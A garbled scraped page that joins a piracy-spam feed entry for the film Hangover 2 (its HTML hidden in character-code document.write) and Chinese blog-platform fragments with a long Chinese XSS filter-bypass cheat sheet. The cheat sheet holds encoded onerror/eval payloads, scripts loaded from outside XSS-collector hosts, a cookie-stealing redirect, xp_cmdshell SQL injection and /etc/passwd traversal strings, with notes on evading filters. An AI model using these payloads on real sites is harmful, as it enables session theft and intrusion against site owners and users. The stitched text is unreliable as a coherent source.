Read the most popular feeds:
document.write(String.fromCharCode(60,100,105,118,32,100,105,114,61,34,108,116,114,34,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,108,101,102,116,34,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,115,112,97,110,32,115,116,121,108,101,61,34,102,111,110,116,45,115,105,122,101,58,32,108,97,114,103,101,34,62,60,98,62,68,111,119,110,108,111,97,100,32,111,114,32,87,97,116,99,104,32,70,117,108,108,32,77,111,118,105,101,32,72,97,110,103,111,118,101,114,32,50,32,40,50,48,49,49,41,32,119,105,116,104,32,97,32,104,105,103,104,32,113,117,97,108,105,116,121,32,112,105,99,116,117,114,101,32,97,110,100,32,101,110,106,111,121,32,97,32,108,111,116,32,111,102,32,38,35,56,50,51,48,59,38,35,56,50,51,48,59,38,35,56,50,51,48,59,38,35,56,50,51,48,59,65,108,115,111,32,100,111,119,110,108,111,97,100,32,102,111,114,32,105,80,97,100,32,38,97,109,112,59,32,105,112,104,111,110,101,60,47,98,62,60,47,115,112,97,110,62,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,99,111,108,111,114,58,32,114,101,100,59,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,98,62,60,115,112,97,110,32,115,116,121,108,101,61,34,102,111,110,116,45,115,105,122,101,58,32,120,45,108,97,114,103,101,34,62,72,97,110,103,111,118,101,114,32,50,32,40,50,48,49,49,41,60,47,115,112,97,110,62,60,47,98,62,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,99,111,108,111,114,58,32,35,51,56,55,54,49,100,59,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,98,62,82,101,108,101,97,115,101,100,32,32,58,32,48,53,47,50,54,47,50,48,49,49,60,47,98,62,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,99,111,108,111,114,58,32,35,51,56,55,54,49,100,59,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,98,62,82,117,110,116,105,109,101,32,32,58,32,32,49,48,50,109,105,110,46,60,47,98,62,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,99,111,108,111,114,58,32,35,51,56,55,54,49,100,59,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,98,62,71,101,110,114,101,115,32,32,32,58,32,67,111,109,101,100,121,60,47,98,62,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,99,111,108,111,114,58,32,35,51,56,55,54,49,100,59,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,98,62,68,105,114,101,99,116,111,114,32,58,32,84,111,100,100,32,80,104,105,108,108,105,112,115,60,47,98,62,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,99,111,108,111,114,58,32,35,51,56,55,54,49,100,59,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,98,62,65,99,116,111,114,115,32,32,32,58,32,66,114,97,100,108,101,121,32,67,111,111,112,101,114,44,32,90,97,99,104,32,71,97,108,105,102,105,97,110,97,107,105,115,32,97,110,100,32,69,100,32,72,101,108,109,115,60,47,98,62,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,47,100,105,118,62,10,60,100,105,118,32,99,108,97,115,115,61,34,115,101,112,97,114,97,116,111,114,34,32,115,116,121,108,101,61,34,99,108,101,97,114,58,32,98,111,116,104,59,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,97,32,116,97,114,103,101,116,61,34,95,98,108,97,110,107,34,32,104,114,101,102,61,34,104,116,116,112,58,47,47,109,111,118,105,101,45,98,111,120,55,46,98,108,111,103,115,112,111,116,46,99,111,109,47,50,48,49,49,47,48,53,47,119,97,116,99,104,45,111,114,45,100,111,119,110,108,111,97,100,45,104,97,110,103,111,118,101,114,45,50,45,50,48,49,49,46,104,116,109,108,34,62,60,105,109,103,32,98,111,114,100,101,114,61,34,48,34,32,115,114,99,61,34,104,116,116,112,58,47,47,49,46,98,112,46,98,108,111,103,115,112,111,116,46,99,111,109,47,45,77,122,75,115,114,65,65,65,78,103,77,47,84,101,74,45,50,102,102,108,108,110,73,47,65,65,65,65,65,65,65,65,65,65,52,47,110,99,117,108,52,77,105,73,88,48,65,47,115,49,54,48,48,47,104,97,110,103,111,118,101,114,45,50,43,99,111,112,121,46,106,112,103,34,32,116,105,116,108,101,61,34,68,111,119,110,108,111,97,100,32,72,97,110,103,111,118,101,114,32,50,32,77,111,118,105,101,32,73,110,32,68,105,118,120,47,73,112,111,100,32,81,117,97,108,105,116,121,34,32,97,108,116,61,34,104,97,110,103,111,118,101,114,32,50,43,99,111,112,121,32,68,111,119,110,108,111,97,100,32,72,97,110,103,111,118,101,114,32,50,32,77,111,118,105,101,32,73,110,32,68,105,118,120,47,73,112,111,100,32,81,117,97,108,105,116,121,34,32,47,62,60,47,97,62,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,84,104,101,114,101,32,97,114,101,32,100,105,102,102,101,114,101,110,116,32,119,97,121,115,32,116,111,32,114,101,101,110,101,114,103,105,122,101,115,32,121,111,117,114,32,115,101,110,115,101,115,32,115,117,99,104,32,97,115,32,115,104,111,112,112,105,110,103,44,32,115,108,101,101,112,105,110,103,44,32,97,110,100,32,110,111,114,109,97,108,32,111,117,116,105,110,103,115,32,98,117,116,32,116,104,101,115,101,32,97,114,101,32,115,111,32,111,98,115,111,108,101,116,101,32,116,111,32,102,105,108,108,32,121,111,117,114,32,119,101,101,107,101,110,100,115,32,119,105,116,104,32,101,120,99,105,116,101,109,101,110,116,46,32,73,110,32,116,111,100,97,121,97,128,153,115,32,115,99,101,110,97,114,105,111,44,32,112,101,111,112,108,101,32,112,114,101,102,101,114,32,116,111,32,87,97,116,99,104,32,72,97,110,103,111,118,101,114,32,50,32,79,110,108,105,110,101,32,111,102,32,116,104,101,105,114,32,99,104,111,105,99,101,32,116,111,32,109,97,107,101,32,116,104,101,105,114,32,100,97,121,32,115,117,112,101,114,98,46,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,89,111,117,32,107,110,111,119,32,102,114,105,101,110,100,115,59,32,68,111,119,110,108,111,97,100,105,110,103,32,109,111,118,105,101,32,105,115,32,111,110,101,32,111,102,32,116,104,101,32,101,120,99,101,108,108,101,110,116,32,119,97,121,115,44,32,119,104,105,99,104,32,116,114,97,110,115,112,111,114,116,32,117,115,32,116,111,32,97,32,99,111,109,112,108,101,116,101,108,121,32,100,105,102,102,101,114,101,110,116,32,119,111,114,108,100,44,32,119,104,101,114,101,32,121,111,117,32,99,97,110,32,102,117,108,102,105,108,108,32,97,108,108,32,116,104,111,115,101,32,100,101,115,105,114,101,115,44,32,112,101,114,104,97,112,115,44,32,119,104,105,99,104,32,97,114,101,32,104,97,114,100,32,116,111,32,98,101,108,105,101,118,101,32,105,110,32,121,111,117,114,32,114,101,97,108,32,108,105,102,101,46,32,84,104,111,115,101,32,119,104,111,32,114,101,103,117,108,97,114,108,121,32,68,111,119,110,108,111,97,100,32,109,111,118,105,101,32,111,102,32,116,104,101,105,114,32,99,104,111,105,99,101,32,102,114,111,109,32,111,117,114,32,101,120,99,108,117,115,105,118,101,32,99,111,108,108,101,99,116,105,111,110,44,32,97,103,114,101,101,32,116,111,32,116,104,105,115,32,110,111,110,45,100,101,110,121,105,110,103,32,102,97,99,116,32,116,104,97,116,32,105,102,32,116,104,101,121,32,68,111,119,110,108,111,97,100,32,109,111,118,105,101,115,32,116,104,101,110,32,116,104,101,121,32,104,97,118,101,32,110,111,32,112,108,97,99,101,32,102,111,114,32,112,97,105,110,115,32,97,110,100,32,112,97,116,104,111,115,46,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,73,102,32,121,111,117,32,115,116,97,114,116,32,68,111,119,110,108,111,97,100,105,110,103,32,109,111,118,105,101,115,32,111,110,32,119,101,101,107,101,110,100,115,32,116,104,101,110,32,121,111,117,32,119,105,108,108,32,114,101,97,108,105,122,101,44,32,103,111,110,101,32,97,114,101,32,100,97,121,115,32,119,104,101,110,32,121,111,117,32,117,115,101,100,32,116,111,32,102,105,103,117,114,101,32,111,117,116,32,104,111,119,32,116,111,32,107,105,108,108,32,116,104,101,32,116,105,109,101,32,111,114,32,104,111,119,32,116,111,32,109,97,107,101,32,121,111,117,114,32,100,97,121,32,98,101,97,117,116,105,102,117,108,46,32,73,110,32,102,97,99,116,32,116,104,105,115,32,105,115,32,97,110,32,105,110,116,101,114,101,115,116,105,110,103,32,109,111,100,101,32,116,111,32,114,101,102,114,101,115,104,32,97,110,100,32,114,101,108,97,120,46,32,68,111,119,110,108,111,97,100,32,72,97,110,103,111,118,101,114,32,50,32,102,114,111,109,32,111,117,114,32,115,112,101,99,105,97,108,32,99,111,108,108,101,99,116,105,111,110,32,97,110,100,32,103,101,116,32,114,101,97,100,121,32,116,111,32,101,120,112,108,111,114,101,32,116,104,101,32,119,111,114,108,100,32,111,102,32,99,111,109,112,108,101,116,101,32,101,110,116,101,114,116,97,105,110,109,101,110,116,46,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,87,101,32,104,97,118,101,32,101,120,99,108,117,115,105,118,101,32,112,108,101,116,104,111,114,97,32,111,102,32,109,111,118,105,101,115,32,119,104,105,99,104,32,105,115,32,115,117,102,102,105,99,105,101,110,116,32,101,110,111,117,103,104,32,116,111,32,102,117,108,102,105,108,108,32,121,111,117,114,32,114,101,113,117,101,115,116,32,97,110,100,32,100,101,109,97,110,100,115,46,32,65,108,108,32,121,111,117,32,110,101,101,100,32,116,111,32,112,101,114,117,115,101,32,116,104,114,111,117,103,104,32,111,117,114,32,119,101,98,115,105,116,101,32,116,111,32,103,101,116,32,97,108,108,32,115,111,114,116,115,32,111,102,32,109,111,118,105,101,115,46,32,87,104,97,116,97,128,153,115,32,109,111,114,101,44,32,121,111,117,32,99,97,110,32,103,101,116,32,116,111,32,107,110,111,119,32,109,111,114,101,32,97,98,111,117,116,32,121,111,117,114,32,102,97,118,111,114,105,116,101,32,99,101,108,101,98,115,32,97,110,100,32,116,104,101,105,114,32,108,97,116,101,115,116,32,116,105,116,108,101,32,116,97,116,116,108,101,115,46,32,70,117,114,116,104,101,114,109,111,114,101,44,32,119,101,32,117,112,100,97,116,101,32,121,111,117,32,97,98,111,117,116,32,115,101,99,114,101,116,32,97,110,100,32,98,101,104,105,110,100,32,116,104,101,32,115,99,101,110,101,32,103,111,115,115,105,112,115,32,119,104,105,99,104,32,121,111,117,32,109,105,103,104,116,32,110,111,116,32,103,101,116,32,97,110,121,119,104,101,114,101,32,101,108,115,101,46,32,73,102,32,121,111,117,32,99,108,111,115,101,108,121,32,112,97,121,32,97,116,116,101,110,116,105,111,110,32,116,111,32,111,117,114,32,108,105,115,116,32,111,102,32,119,101,98,115,105,116,101,44,32,102,114,111,109,32,119,104,101,114,101,32,121,111,117,32,68,111,119,110,108,111,97,100,32,109,111,118,105,101,115,44,32,116,104,101,110,32,121,111,117,32,119,105,108,108,32,110,111,116,105,99,101,32,116,104,97,116,32,119,101,32,97,114,101,32,110,111,116,32,114,101,115,116,114,105,99,116,101,100,32,116,111,32,72,111,108,108,121,119,111,111,100,32,109,111,118,105,101,115,59,32,105,110,32,102,97,99,116,32,119,101,32,104,97,118,101,32,103,111,110,101,32,98,101,121,111,110,100,32,97,110,100,32,99,111,118,101,114,101,100,32,111,116,104,101,114,32,102,105,108,109,32,105,110,100,117,115,116,114,105,101,115,32,97,115,32,119,101,108,108,46,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,73,102,32,121,111,117,32,119,97,110,116,32,116,111,32,102,105,108,108,32,121,111,117,114,32,108,105,102,101,32,119,105,116,104,32,97,108,108,32,116,104,101,32,101,109,111,116,105,111,110,115,32,97,110,100,32,121,111,117,32,104,97,118,101,32,97,32,100,101,115,105,114,101,32,116,111,32,108,105,118,101,32,97,108,108,32,121,111,117,114,32,100,114,101,97,109,115,32,116,104,101,110,32,68,111,119,110,108,111,97,100,105,110,103,32,109,111,118,105,101,115,32,105,115,32,97,110,32,101,120,99,101,108,108,101,110,116,32,97,108,116,101,114,110,97,116,105,118,101,46,32,71,111,110,101,32,97,114,101,32,100,97,121,115,32,119,104,101,110,32,112,101,111,112,108,101,32,117,115,101,100,32,116,111,32,100,111,32,115,104,111,112,112,105,110,103,32,97,110,100,32,111,117,116,105,110,103,32,116,111,32,109,97,107,101,32,116,104,101,105,114,32,119,101,101,107,101,110,100,115,32,119,111,110,100,101,114,102,117,108,46,32,78,111,119,32,105,116,97,128,153,115,32,116,105,109,101,32,102,111,114,32,115,111,109,101,116,104,105,110,103,32,110,101,119,32,97,110,100,32,105,110,116,101,114,101,115,116,105,110,103,59,32,115,111,32,87,97,116,99,104,32,72,97,110,103,111,118,101,114,32,50,32,111,110,108,105,110,101,32,116,111,32,101,110,101,114,103,105,101,115,32,121,111,117,114,32,100,117,108,108,32,97,110,100,32,98,111,114,105,110,103,32,119,101,101,107,101,110,100,115,46,72,97,110,103,111,118,101,114,32,50,44,87,97,116,99,104,32,72,97,110,103,111,118,101,114,32,50,44,32,68,111,119,110,108,111,97,100,32,72,97,110,103,111,118,101,114,32,50,44,32,87,97,116,99,104,32,72,97,110,103,111,118,101,114,32,50,32,111,110,108,105,110,101,44,72,97,110,103,111,118,101,114,32,50,32,102,111,114,32,105,80,104,111,110,101,44,72,97,110,103,111,118,101,114,32,50,32,102,111,114,32,105,80,97,100,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,47,100,105,118,62,10,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,34,62,10,60,112,62,72,97,110,103,111,118,101,114,32,50,44,87,97,116,99,104,32,72,97,110,103,111,118,101,114,32,50,44,32,68,111,119,110,108,111,97,100,32,72,97,110,103,111,118,101,114,32,50,44,32,87,97,116,99,104,32,72,97,110,103,111,118,101,114,32,50,32,111,110,108,105,110,101,44,72,97,110,103,111,118,101,114,32,50,32,102,111,114,32,105,80,104,111,110,101,44,72,97,110,103,111,118,101,114,32,50,32,102,111,114,32,105,80,97,100,60,98,114,32,47,62,10,87,97,116,99,104,32,111,114,32,68,111,119,110,108,111,97,100,32,72,97,110,103,111,118,101,114,32,50,32,40,50,48,49,49,41,60,47,112,62,60,47,100,105,118,62,10,60,47,100,105,118,62));|Feed favorited by 1 person.
Download or Watch Full Movie Hangover 2 (2011) with a high quality picture and enjoy a lot of …………Also download for iPad & iphone
Hangover 2 (2011)
: 05/26/2011
Director : Todd Phillips
: Bradley Cooper, Zach Galifianakis and Ed Helms
There are different ways to reenergizes your senses such as shopping, sleeping, and normal outings but these are so obsolete to fill your weekends with excitement. In today’s scenario, people prefer to Watch Hangover 2 Online of their choice to make their day superb.
Y Downloading movie is one of the excellent ways, which transport us to a completely different world, where you can fulfill all those desires, perhaps, which are hard to believe in your real life. Those who regularly Download movie of their choice from our exclusive collection, agree to this non-denying fact that if they Download movies then they have no place for pains and pathos.
If you start Downloading movies on weekends then you will realize, gone are days when you used to figure out how to kill the time or how to make your day beautiful. In fact this is an interesting mode to refresh and relax. Download Hangover 2 from our special collection and get ready to explore the world of complete entertainment.
We have exclusive plethora of movies which is sufficient enough to fulfill your request and demands. All you need to peruse through our website to get all sorts of movies. What’s more, you can get to know more about your favorite celebs and their latest title tattles. Furthermore, we update you about secret and behind the scene gossips which you might not get anywhere else. If you closely pay attention to our list of website, from where you Download movies, then you will notice that we are not restricted to H in fact we have gone beyond and covered other film industries as well.
If you want to fill your life with all the emotions and you have a desire to live all your dreams then Downloading movies is an excellent alternative. Gone are days when people used to do shopping and outing to make their weekends wonderful. Now it’s time for something so Watch Hangover 2 online to energies your dull and boring weekends.Hangover 2,Watch Hangover 2, Download Hangover 2, Watch Hangover 2 online,Hangover 2 for iPhone,Hangover 2 for iPad
Hangover 2,Watch Hangover 2, Download Hangover 2, Watch Hangover 2 online,Hangover 2 for iPhone,Hangover 2 for iPad
Watch or Download Hangover 2 (2011)
[1] http://movie-/2011/05/watch-or-download-hangover-2-2011.html
« Previous 1 Next » Homepage: Feed URL: Bookmark: Added by:
User submitted feeds
Find or add a new feed:
Enter website or RSS feed URL:
Upload/import OPML file:
Bookmarklet
Drag this link to your browser bookmarks bar, then click it whenever you want to add the site you're viewing .温馨提示！由于新浪微博认证机制调整，您的新浪微博帐号绑定已过期，请重新绑定！&&|&&
LOFTER精选
网易考拉推荐
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
"&&img src="" onerror="document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(49)+String.fromCharCode(41)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))"& &在网页过滤了&script和单引号的情况下可以使用代码绕过,上面write中内容输出的结果是&script&alert(1)&/script& & 如果想缩短，可以把上面的参数合并，像这样：String.fromCharCode(76,90,83,66);"&&meta http-equiv="Refresh" content="0;url=javascript:document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))& 遇到过滤&script&无法调用js的时候也可以用类似的代码突破，上面代码是跳转url到javascript:document.write("&script src=xxx&&/script&") 也就是调用js文件xxx 如果想缩短，可以把上面的参数合并，像这样：String.fromCharCode(76,90,83,66);"&&iframe src=javascript:alert(document.cookie); height=0 width=0 /& &&iframe&弹窗&iframe src=javascript:with(document)0[body.appendChild(document.createElement('script')).src="/1.js"]&&/iframe& iframe收信&&img src=x onerror=appendChild(createElement('script')).src='//js地址' /& img标签来收信&img/**/src=1/**/onerror="with(document)body.appendChild(createElement('script')).src='脚本地址'" /& & 过滤了 &script&标签 以及空格 的解决办法&img src="5" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")&&/img& &回显是&img src="5" onerror=eval("alert('xss')")&&/img& &&如果你要加载脚本请这样：javascript:document.write(unescape(' &script src="脚本地址"&&/script&')); 修改好后 进行HEX加密再放入eval&注：第一段代码：首先将要执行的 利用Hex 编码 再img 的错误事件 用eval 函数 操控()内的代码！eval 可以计算 并执行 将上面代码解码后便执行了！&第二段加载脚本的：首先是利用 javascript unescape函数 对()内的HEX编码进行解码 然后再通过document.write 在文档对象上面输入()内的内容！&因为()内的内容以及经过unescape的解码 所以输出来后是正常的 如果没有进行解码 那么你输出来的 将会是hex&在这里没有出现 script等危险标签 也没有单引号 所以成功绕过！ & &过滤了单引号 以及几个危险标签&script&document.write(String.fromCharCode(在这里写上你的代码));&/script& & 过滤了等号 单引号 双引号 空格的绕过方法&img src=1 onerror=javascript:alert("\x58S\x53\40\x41t\x74\x61\x63\153e\162")& &该过滤的都过滤了&img src=x onerror=alert(/insight-labs/)&、&p onmouseover=alert(/insight-labs/)&insight-labs、&frameset onload=alert(/insight-labs/)&、&body onload=alert(/insight-labs/)& & 事件函数 来弹窗屏蔽了scaript可以把scaript改成sc%0aript来绕过"h"+"t"+"t"+"p"，绕过对http的过滤'"&&script&alert(/1/)&/script&&a="'"&&script src=http://x.co/xiHv&&/script&&a="='&&script&alert(document.cookie)&/script&&script&alert(document.cookie)&/script&&script&alert(vulnerable)&/script&%3Cscript%3Ealert('XSS')%3C/script%3E'"&&script src="//x.co/xiHv"&&/script&&a="'"&&script src=//xss.tw/2045&&/script&&a="'"&&script src=//xss.tw/3058&&/script&&a="&&script&src=//xss.tw/3058&&/script&& &引号& &空格& & &&& & &&无src 无等号 &无引号"&&/span&&script&document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,120,46,99,111,47,120,105,72,118,62,60,47,115,99,114,105,112,116,62));&/script&&span&eval(Dec('203','2549'));&div style="display:none"&&/div&&div style="display:none" &t="1" &e="style\/&'&&&/div&&/ \&&/&img src=# onerror=eval(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,47,47,120,115,115,46,116,119,47,51,48,53,56,62,60,47,115,99,114,105,112,116,62,32));/\>&&div id="myxsxxcd" style="color:display:none" title="if(!window.myxsssxx){window.myxsssxx=123;alert(document.cookie);}"&&DIV&&A&&/A&&STYLE&&!--a{& img src=&/STYLE&;x:expression(eval(myxsxxcd.title));&style&}--&&/style&&/DIV&&td width="628" background="/img/index2_r7_c2_r1_c5_s1_s1.jpg"&&img src=x onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,46,116,119,47,51,51,56,49,34))&&&img src=x onerror=eval(String.fromCharCode(document.body.appendChild(createElement("script")).src="http://xss.tw/3381"))&&img src=x onerror=document.body.appendChild(createElement('script')).src="javascript:alert(/1/)"&&&img src=x onerror=document.body.appendChild(createElement('script')).src='http://xss8.net/? c=QihaL'&&p&&img class="reference" contenteditable="false" data-refid="2" data-type="reference" onerror="eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,56,46,110,101,116,47,63,99,61,81,105,104,97,76,34))" src="/img/baike/editor/reference.gif" unselectable="on" /&&/p&eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,56,46,110,101,116,47,63,99,61,81,105,104,97,76,34))&div class="qm_left" style="position:z-index:2;background:url(//xss.tw/2180) no-repeat 0 0;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='//xss.tw/2180',sizingMethod='scale');width:40height:40"&&span class="qm_ico_print" id="mail_print" title="打印" onclick="window.open('/cgi-bin/readmail?sid=SC_hEOi3h_nqEgJQ&');"&&/span&ECMAScript v3 已从标准中删除了 unescape() 函数，并反对使用它因此应该用 decodeURI() 和 decodeURIComponent() 取而代之。通过找到形式为 %xx 和 %uxxxx 的字符序列（x 表示十六进制的数字）用 Unicode 字符 \u00xx 和 \uxxxx 替换这样的字符序列进行解码。解密是unescape('%udcdb%uced3%u8d93%u888a%ud58f%u');加密是escape('%udcdb%uced3%u8d93%u888a%ud58f%ud4c8%udcd9%ud ');&javascript:document.write(unescape('&script src="/x.js"&&/script&'));document.write(String.fromCharCode(60,12,62)); &==== &document.write(String.fromCharCode(&script src=http://xss.me/1&&/script&));&"&&/span&&script&document.write()&/script&&span&[email][url][img] onmouseover=eval(String.fromCharCode(116,114)); [/img][/url][/email]鼠标单击&a href="" style="color:#143d70;" onclick="alert(/a/);this.style.behavior='url(#default#homepage)';this.setHomePage(''); return(false);"&asdasdsad&/a&&table background=”javascript:alert(/xss/)”&&/table&’/在表格中插入脚本&&过滤用\x3cscript. src= /malicious-code.js\x3e\x3c/script\x3e&&script defer="defer"&var a,b;a="/";b="/x.co/xiHv";window.open(a+b,"","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=500,height=500");&/script&&% string str_a = rrequest.getParameter("a");%&&var a= &%=str_a%&document.write(a);&img src="123"&a.jsp/&script&alert('Vulnerable')&/script&a/a?&script&alert('Vulnerable')&/script&"&&script>alert('xss')</script&';exec%20master..xp_cmdshell%20'dir%20 c:%20&%20c:\inetpub\wwwroot\?.txt'--&&%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cscript%3Ealert(document. domain);%3C/script%3E&%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=../../../../../../../../etc/passwd..\..\..\..\..\..\..\..\windows\system.ini\..\..\..\..\..\..\..\..\windows\system.ini'';!--"&XSS&=&{()}&IMG src="javascript:alert('XSS');"&&IMG src=javascript:alert('XSS')&&IMG src=JaVaScRiPt:alert('XSS')&&IMG src=JaVaScRiPt:alert("XSS")&&IMG src=javascript:alert('XSS')&&IMG src=javascript:alert('XSS')&&IMG src=javascript:alert('XSS')&&&sRCIpt&alert(/123/)&/ScRpT&&P&&SPAN class=xmsw title=防火外墙保温材料 onmouseout="window.location=''"&了解你的产品和行&/SPAN&&/P&&div style="background-image:url(&script&alert(document.cookie)&/script&)"&&div style="background-image:url(javascript:alert(document.cookie))"&&div style="behaviour:url('http://www.how-to-hack.org/exploit.html');"&&div style="width:expression(alert('x123ss'));"&&img src="java&#script:alert(/1231/);"&&img src=javａｓcript:alert(/1231/);&&img src="javascript:alert('XSS')"&&IMG src="jav ascript:alert('XaSS');"&&IMG src="jav ascript:alert('XbSS');"&&IMG src="jav ascript:alert('XcSS');"&"&IMG src=java\0script:alert(\"XSS\")&";' & out&IMG src=" javascript:alert('XdSS');"&&SCRIPT&a=/XSfS/alert(a.source)&/SCRIPT&&BODY BACKGROUND="javascript:alert('XeSS')"&&BODY ONLOAD=alert('XgSS')&&IMG DYNSRC="javascript:alert('XhSS')"&&IMG LOWSRC="javascript:alert('XiSS')"&&BGSOUND src="javascript:alert('XjSS');"&&span onclick="javascript:changeFont(2);"&&SPAN class=xmsw title=dd onmouseout=window.location=''&test&/span&&span class="xmsw" title="dd" onmouseout=window.location='http://test/test.php?c='+document.cookie&test&/span&&SPAN class=xmsw title=dd onmouseout=javascript:alert(document.cookie)&test&/SPAN&&br size="&{alert('XkSS')}"&&LAYER src="http://xss.ha.ckers.org/a.js"&&/layer&&LINK REL="stylesheet" href="javascript:alert('XlSS');"&&IMG src='vbscript:msgbox("XmSS")'&&IMG src="mocha:[code]"&&IMG src="livescript:[code]"&&META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XoSS');"&&IFR & &AME src=javascript:alert('XSnS')&&/IFRA & &ME&&FRAMESET&&FRAME src=javascript:alert('XpSS')&&/FRAME&&/FRAMESET&&TABLE BACKGROUND="javascript:alert('XSqS')"&&DIV STYLE="background-image: url(javascript:alert('X1SS'))"&&DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');"&&DIV STYLE="width: expression(alert('X2SS'));"&&STYLE&@im\port'\ja\vasc\ript:alert("X3SS")';&/STYLE&&IMG STYLE='xss:expre\ssion(alert("X5SS"))'&&STYLE TYPE="text/javascript"&alert('X4SS');&/STYLE&&STYLE TYPE="text/css"&.XSS{background-image:url("javascript:alert('X6SS')");}&/STYLE&&A CLASS=XSS&&/A&&STYLE type="text/css"&BODY{background:url("javascript:alert('X7SS')")}&/STYLE&&BASE 